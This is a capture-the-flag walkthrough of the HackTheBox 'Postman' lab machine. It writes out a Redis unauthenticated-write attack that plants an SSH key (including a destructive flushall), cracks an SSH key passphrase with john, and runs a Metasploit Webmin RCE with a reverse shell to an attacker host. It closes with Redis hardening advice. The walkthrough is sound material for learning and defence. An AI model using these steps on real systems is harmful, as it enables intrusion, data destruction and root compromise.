
HackTheBox Postman Machine Info Card

Postman is an easy difficulty machine running Linux. It tests your knowledge in OSINT, Redis exploitation and basic Privilege Escalation through a known exploit. There is nothing overly complicated about this machine as long as you stick to basic enumeration and don’t get too carried away.

Be sure to check out the Basic Setup section before you get started.


Like always, enumeration is our first port of call. Let’s take a look at the machine and see what we are dealing with.


portscan postman.htb
Grabbing ports...
Ports grabbed!
Starting Nmap 7.80 ( ) at 2019-12-02 06:11 PST
Nmap scan report for postman.htb (
Host is up (0.35s latency).

22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
|   256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_  256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geeks Personal Website
6379/tcp  open  redis   Redis key-value store 4.0.9
10000/tcp open  http    MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 43.36 seconds

From the output we see a website on port 80 (Apache 2.4.29), Redis 4.0.9 on port 6379 and Webmin 1.910 on port 10000, with SSH on port 22. Redis has no authentication unless requirepass is configured, so an instance reachable over the network is worth a close look.

Directory Bruteforce

Doing a scan with Gobuster using the dir mode reveals some files and directories:

gobuster dir -u http://postman.htb -r -t 30 -w /usr/share/wordlists/dirb/big.txt -x .php,.txt,.html -o gobuster.txt
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
[+] Url:            http://postman.htb
[+] Threads:        30
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt,html
[+] Follow Redir:   true
[+] Timeout:        10s
2019/12/02 06:16:32 Starting gobuster
/css (Status: 200)
/fonts (Status: 200)
/images (Status: 200)
/index.html (Status: 200)
/js (Status: 200)
/server-status (Status: 403)
/upload (Status: 200)
2019/12/02 06:22:02 Finished

An interesting find is the upload directory!


Let’s checkout the website at http://postman.htb:

Postman Main Screenshot

Nothing exciting. Let’s check the upload directory:

Postman Upload Directory Screenshot

We find nothing useful and cannot find an upload form. Let’s move on for now.


Checking Exploit-DB with searchsploit for anything relating to our Webmin version, we find the following:

searchsploit webmin 1.910
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                    |  Path
                                                                                                                                                  | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit)                                                                            | exploits/linux/remote/46984.rb
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

Taking a look at this exploit we see that it requires valid credentials, so we will come back to it once we have some.


Let’s do a quick test to see whether Redis accepts commands without authentication, using redis-cli to write a throwaway key:

redis-cli -h postman.htb -p 6379 set with_space 'boo'

The write succeeds, so no requirepass is set. Connecting interactively with redis-cli -h postman.htb -p 6379 we find that CONFIG has not been renamed or disabled either, so we can change runtime settings with the config set command.

Installing Redis on our local machine lets us see how it is packaged and configured. On Ubuntu the redis-server package creates a system user named redis with the home directory /var/lib/redis, and the server runs as that user, so anything we make it write with save is created with that user's permissions. The only place we can be sure it can write is /var/lib/redis, so we will focus on that area.


A quick web search turns up a well-known abuse of misconfigured Redis servers. CONFIG SET lets us choose the directory and filename of the RDB snapshot, so SAVE can be made to write a file anywhere the redis user has write access; written to /var/lib/redis/.ssh/authorized_keys, it lets us log in as that user via SSH. If you remember from our nmap scan, SSH is open on port 22.

Let’s give this a try:

First we create an RSA key pair:

ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): 
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/
The key fingerprint is:
SHA256:BHSzzWs/IESstXc+Zseq/OVFX9JdCu0oJNeKdSZkMrs root@kali
The key's randomart image is:
+---[RSA 3072]----+
|     .o.* o      |
|       +o@ . .   |
|       o*.B = . .|
|      .o.B.*.+ oo|
|        E.*o..+ =|
|         o += ooo|
|           oo+. o|
|         .  .+ . |
|          oo. .  |

Now let’s put the public key in a text file with blank lines on either side. The snapshot that save writes is a binary RDB file with a header and a trailer around our value; sshd reads authorized_keys line by line and ignores any line it cannot parse as a key, so the padding guarantees the key ends up on a line of its own with no binary bytes in front of it:

(echo -e "\n\n"; cat ~/.ssh/; echo -e "\n\n") > ssh.txt

We will now flush the Redis datastore so the snapshot contains nothing but our key. On a real engagement this is destructive: flushall wipes every key on the server, so make sure that is within scope before running it:

redis-cli -h postman.htb flushall

And write the ssh.txt file we created into a key on the Redis server with redis-cli (-x reads the value from stdin):

cat ssh.txt | redis-cli -h postman.htb -x set ssh

Now we will connect to the redis-server and set the dir option to /var/lib/redis/.ssh and confirm that the options have been updated successfully:

redis-cli -h postman.htb
postman.htb:6379> config set dir /var/lib/redis/.ssh
postman.htb:6379> config get dir
1) "dir"
2) "/var/lib/redis/.ssh"

We then set the name of the file we want to save to the dir location and check that the options have been updated successfully:

postman.htb:6379> config set dbfilename "authorized_keys"
postman.htb:6379> config get dbfilename
1) "dbfilename"
2) "authorized_keys"

Now for the moment of truth. Can we save our ssh key to the .ssh folder, let’s see:

postman.htb:6379> save

Yes we can. The file was saved successfully.

Now to try logging in via ssh:

ssh -i ~/.ssh/id_rsa -l redis postman.htb
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)

 * Documentation:
 * Management:
 * Support:

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
Last login: Mon Aug 26 03:04:25 2019 from

The first thing we notice is that there is no user.txt in the redis user's home directory. A quick look in /home shows the directory Matt, which contains the user.txt flag:

redis@Postman:~$ ls -l /home/Matt/user.txt 
-rw-rw---- 1 Matt Matt 33 Aug 26 03:07 /home/Matt/user.txt

We will need to get access to the Matt account.

Having a look around /var/lib/redis we find the usual .bash_history file, to which we have read access.

Viewing the contents we see commands that were run from this account, including switching to Matt and reading a file called id_rsa.bak:

redis@Postman:~$ cat .bash_history 
su Matt
cat /etc/ssh/sshd_config 
su Matt
cd /var/lib/redis
su Matt
cat id_rsa.bak 

We quickly notice the file id_rsa.bak. We are obviously going with an ssh theme here.

Let’s do a search for the file:

redis@Postman:~$ find / -name id_rsa.bak 2>&1 | grep -v "Permission denied"
/opt/id_rsa.bak

Nice. Let’s try and use it straight away and see if there is a passphrase:

redis@Postman:~$ ssh -i /opt/id_rsa.bak -l Matt localhost
Enter passphrase for key '/opt/id_rsa.bak': 

Looks like Matt isn’t a complete idiot.

We will need to crack the passphrase. John the Ripper works well for this: ssh2john converts the key into a hash format john understands, and john then runs a wordlist against it. The key is in the legacy PEM format (the john output below reports the KDF/cipher as MD5/3DES), whose key derivation is a single unstretched MD5-based step, so guessing is very fast:

python ssh2john.py ~/Documents/postman/id_rsa.bak > ~/Documents/postman/id_rsa.hash

On Kali ssh2john is not on the PATH, but it ships with the john package as /usr/share/john/ssh2john.py; otherwise it can be downloaded from the John the Ripper source repository.

Now let’s crack the hash:

john --wordlist=/root/Wordlists/passwords/passwords.txt id_rsa.hash 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
com....08     (/root/Documents/postman/id_rsa.bak)
4g 0:00:02:44 DONE (2019-12-03 10:44) 0.02431g/s 1841Kp/s 1841Kc/s 1841KC/s 233091..hielox
Session completed
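As an added example, not code from the original write-up: before reaching for john it is worth knowing what you are cracking. The script below reads the armour and header of an OpenSSH private key and reports the format, cipher and key-derivation function, which is what decides whether a wordlist run is realistic. Legacy PEM keys (BEGIN RSA PRIVATE KEY with a DEK-Info header, which is what the MD5/3DES cost line in the john output above indicates for id_rsa.bak) derive the key with OpenSSL's MD5-based EVP_BytesToKey and no stretching; the newer openssh-key-v1 format records a bcrypt round count that makes each guess far more expensive. The sample keys are constructed placeholders with no real key material, and the function names are my own.

```python
#!/usr/bin/env python3
"""Added example (not from the original write-up): inspect an SSH private key
and report how its passphrase is protected. Sample keys are constructed
placeholders containing no real key material."""
import base64
import struct

OPENSSH_MAGIC = b"openssh-key-v1\x00"


def _pem_body(text, begin, end):
    """Split an armoured block into its header lines and the joined base64 body."""
    lines = [ln.strip() for ln in text.strip().splitlines()]
    if lines[0] != begin or lines[-1] != end:
        raise ValueError("not the expected PEM block")
    inner = lines[1:-1]
    headers = [ln for ln in inner if ":" in ln]
    body = "".join(ln for ln in inner if ln and ":" not in ln)
    return headers, body


def _ssh_string(buf, off):
    """Read one length-prefixed SSH string; return (value, new offset)."""
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n


def classify_private_key(text):
    """Return format / encrypted / cipher / kdf / rounds for a private key.
    Legacy PEM ("BEGIN RSA PRIVATE KEY" + DEK-Info) is encrypted with OpenSSL's
    EVP_BytesToKey: MD5 over passphrase and salt with no stretching, hence the
    MD5/3DES or MD5/AES cost john reports and the millions of guesses per second.
    openssh-key-v1 records cipher, KDF and bcrypt rounds in its header."""
    first = text.strip().splitlines()[0].strip()
    if first == "-----BEGIN OPENSSH PRIVATE KEY-----":
        _, body = _pem_body(text, first, "-----END OPENSSH PRIVATE KEY-----")
        blob = base64.b64decode(body)
        if not blob.startswith(OPENSSH_MAGIC):
            raise ValueError("bad openssh-key-v1 magic")
        off = len(OPENSSH_MAGIC)
        cipher, off = _ssh_string(blob, off)
        kdf, off = _ssh_string(blob, off)
        kdfopts, off = _ssh_string(blob, off)
        rounds = None
        if kdf == b"bcrypt":  # kdfoptions = string salt, uint32 rounds
            _salt, o = _ssh_string(kdfopts, 0)
            (rounds,) = struct.unpack(">I", kdfopts[o:o + 4])
        return {"format": "openssh-v1", "encrypted": cipher != b"none",
                "cipher": cipher.decode(), "kdf": kdf.decode(), "rounds": rounds}
    if first.startswith("-----BEGIN ") and first.endswith(" PRIVATE KEY-----"):
        headers, _ = _pem_body(text, first, first.replace("BEGIN", "END"))
        dek = [h for h in headers if h.startswith("DEK-Info:")]
        if not dek:
            return {"format": "pem-legacy", "encrypted": False,
                    "cipher": None, "kdf": None, "rounds": None}
        cipher = dek[0].split(":", 1)[1].strip().split(",")[0]
        return {"format": "pem-legacy", "encrypted": True, "cipher": cipher,
                "kdf": "md5-evp-bytestokey", "rounds": 1}
    raise ValueError("unrecognised private key armour")


def build_openssh_v1_sample(cipher, kdf, rounds):
    """Constructed openssh-key-v1 key with the real header layout (magic,
    cipher, kdf, kdfoptions, key count, public key, private section) but
    placeholder key material. Only the header fields are meaningful."""
    def s(b):
        return struct.pack(">I", len(b)) + b
    kdfopts = (s(b"\x00" * 16) + struct.pack(">I", rounds)) if kdf == "bcrypt" else b""
    blob = (OPENSSH_MAGIC + s(cipher.encode()) + s(kdf.encode()) + s(kdfopts)
            + struct.pack(">I", 1) + s(b"placeholder-public") + s(b"placeholder-private"))
    b64 = base64.b64encode(blob).decode()
    wrapped = "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
    return ("-----BEGIN OPENSSH PRIVATE KEY-----\n" + wrapped
            + "\n-----END OPENSSH PRIVATE KEY-----\n")


# Constructed legacy PEM key: genuine header lines, placeholder body, no real key.
SAMPLE_LEGACY_PEM = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-----END RSA PRIVATE KEY-----
"""

if __name__ == "__main__":
    print(classify_private_key(SAMPLE_LEGACY_PEM))
    print(classify_private_key(build_openssh_v1_sample("aes256-ctr", "bcrypt", 16)))
```

With a real key, classify_private_key(open(path).read()) is enough. A pem-legacy result with encrypted True is the cheap case seen on this box; openssh-v1 with bcrypt and 16 or more rounds (ssh-keygen's default for new keys) pushes every candidate through bcrypt_pbkdf that many times, and a multi-million-word list is no longer a two-minute job.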

Ok, I take back what I said. Matt’s an idiot! Now let’s try to log in via ssh locally from the redis shell:

redis@Postman:~$ ssh -i /opt/id_rsa.bak -l Matt localhost
Enter passphrase for key '/opt/id_rsa.bak': 
Connection closed by ::1 port 22

Looks like we have an issue. The passphrase was accepted, but the server closed the connection straight after authentication, which suggests Matt is not allowed to log in over SSH at all. This reminds me that there was a command in .bash_history reading /etc/ssh/sshd_config, the SSH server configuration. Taking a look we can see that Matt is explicitly denied SSH access:

redis@Postman:~$ grep DenyUsers /etc/ssh/sshd_config
DenyUsers Matt

Let’s try the passphrase as Matt’s account password with su instead:

redis@Postman:~$ su Matt

We can now grab the user flag in Matt’s home directory:

Matt@Postman:~$ cat user.txt

On to root!


Now that we have credentials, the Webmin exploit we saw earlier, which required a valid login, looks like the way to go. Webmin runs as root, so command execution through it should give us root directly.

Exploit-DB listed it as Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit), so let’s find the module:

msf5 > search type:exploit name:webmin package

Matching Modules

   #  Name                                     Disclosure Date  Rank       Check  Description
   -  ----                                     ---------------  ----       -----  -----------
   0  exploit/linux/http/webmin_packageup_rce  2019-05-16       excellent  Yes    Webmin Package Updates Remote Command Execution

msf5 > use exploit/linux/http/webmin_packageup_rce
msf5 exploit(linux/http/webmin_packageup_rce) > set PASSWORD com....08
PASSWORD => computer2008
msf5 exploit(linux/http/webmin_packageup_rce) > set username Matt
username => Matt
msf5 exploit(linux/http/webmin_packageup_rce) > set lhost <attacker-ip>
lhost =>
msf5 exploit(linux/http/webmin_packageup_rce) > set rhosts postman.htb
rhosts => postman.htb
msf5 exploit(linux/http/webmin_packageup_rce) > set ssl true
ssl => true
msf5 exploit(linux/http/webmin_packageup_rce) > exploit

[*] Started reverse TCP handler on 
[+] Session cookie: 501c01341b72936a3e2c8cc9db790a16
[*] Attempting to execute the payload...
[*] Command shell session 1 opened ( -> at 2019-12-03 11:02:32 -0800
uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt

And we are done :)


This machine was straightforward given sufficient research to establish how things work. Redis instances exposed without authentication have been a real problem in the past and can still be found in the wild today; the fix is to bind Redis to localhost or an internal interface, set requirepass, and rename or disable CONFIG so that clients cannot redirect the snapshot. Overall this was an enjoyable machine.
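As an added note that is not part of the original write-up, here is the shape of the weak configuration beside its hardened equivalent in redis.conf terms. The directives are standard Redis 4.x ones; the bind address on the box is an assumption based on the service being reachable from outside, and the password is a placeholder.

```conf
# Exposed, roughly what Postman appears to run: reachable on every interface,
# no password, CONFIG available to any client that can reach port 6379.
bind 0.0.0.0
protected-mode no
# requirepass not set

# Hardened equivalent: listen only where needed, require a password,
# and take CONFIG and FLUSHALL away from clients so the snapshot
# directory and filename can no longer be redirected from the network.
bind 127.0.0.1
protected-mode yes
requirepass CHANGE-ME-to-a-long-random-secret
rename-command CONFIG ""
rename-command FLUSHALL ""
```

Renaming CONFIG also removes it from your own redis-cli sessions, so runtime tuning then has to go through the config file and a restart; that is usually the right trade on anything reachable beyond localhost.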
